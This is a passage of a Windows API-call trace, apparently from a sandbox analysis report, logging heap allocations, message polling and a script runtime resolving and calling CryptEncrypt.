hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0215.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0215.740] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0215.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0215.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a2) returned 0x2f24018 [0215.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0215.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0215.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0215.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0215.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a2) returned 0x2f28378 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0215.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0215.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0215.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.744] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0215.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0215.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.744] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0215.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.744] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0215.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0215.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0215.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.745] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.745] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0215.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0215.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0215.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.746] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ad0 [0215.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0215.747] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540a8 [0215.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0215.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0215.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0215.748] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x21a2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x21a8) returned 1 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0215.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0215.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0215.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0215.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.750] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0215.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0215.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 